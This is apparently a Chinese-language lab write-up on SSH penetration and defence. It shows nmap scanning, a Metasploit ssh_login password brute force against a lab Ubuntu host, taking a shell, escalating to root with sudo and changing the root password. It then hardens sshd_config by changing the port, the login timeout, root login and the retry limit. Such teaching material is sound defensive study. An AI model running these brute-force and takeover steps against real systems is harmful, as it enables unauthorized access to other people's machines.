网络安全: Kali Linux 进行 SSH 渗透与防御

目录

一、实验

1.环境

2.nmap扫描目标主机

[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)

[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)

二、问题

1.SSH有哪些安全配置


一、实验

1.环境

(1)主机

表1 主机

|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |

(2)查看Kali Linux (2022.4)系统版本

bash 复制代码
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

bash 复制代码
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

bash 复制代码
lsb_release -a
bash 复制代码
ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

复制代码
 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

复制代码
nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

bash 复制代码
msfconsole

(2) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(3) 使⽤编号为 0 的脚本

复制代码
use 0

(4) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(4)查看选项

bash 复制代码
show options

(5)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(6)运⾏脚本

bash 复制代码
run 

(7)查看会话

bash 复制代码
sessions

(8)连接会话

bash 复制代码
sessions 1

查看用户身份

bash 复制代码
whoami

查看路径

bash 复制代码
pwd

提升权限

bash 复制代码
 sudo -i

再次查看用户身份

bash 复制代码
whoami

更改密码

bash 复制代码
password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改端口

(2)重启

bash 复制代码
/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

bash 复制代码
msfconsole

(6) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(6) 使⽤编号为 0 的脚本

bash 复制代码
use 0

(7) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(8)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(9)运⾏脚本

失败

bash 复制代码
run 

(10)nmap扫描端口

ssh端口为12345

bash 复制代码
nmap -sV 192.168.204.143

(11)查看选项

bash 复制代码
show options

(12) 设置目标端口

bash 复制代码
set rport 12345

(13)运⾏脚本

bash 复制代码
run 

( 14)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

bash 复制代码
/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

bash 复制代码
vim /etc/ssh/sshd_config

修改容错次数

(18)重启

bash 复制代码
/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

bash 复制代码
Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers [email protected]    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

bash 复制代码
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

bash 复制代码
exit -y
相关推荐
Gold Steps.几秒前
JumpServer:解锁运维安全的数字 “钥匙”
运维·安全·jumpserver
卫生纸不够用5 分钟前
(三)Linux性能优化-CPU-CPU 使用率
linux·运维·服务器
云布道师44 分钟前
云服务运行安全创新标杆:阿里云飞天洛神云网络子系统“齐天”再次斩获奖项
网络·人工智能·安全·阿里云·云计算·云布道师
Clownseven1 小时前
Ubuntu 24.04 LTS 长期支持版发布:对服务器用户意味着什么?新特性、升级建议与性能影响初探
linux·服务器·ubuntu
wanhengidc1 小时前
高防服务器中高防和硬防之间的区别
运维·服务器·网络
Xam_d_LM1 小时前
【Linux】服务器反向代理自动续签免费 Let‘s Encrypt 证书报错解决方法
linux·运维·服务器·反向代理·lets encrypt·http-01·证书续签
wanhengidc1 小时前
服务器硬防的应用场景都有哪些?
运维·服务器·网络
复园电子1 小时前
USB扩展器与USB服务器的2个主要区别
运维·服务器
Rverdoser1 小时前
服务器内存能不能用在台式机上
运维·服务器
有时有晌2 小时前
linux arm系统烧录
linux·运维·arm开发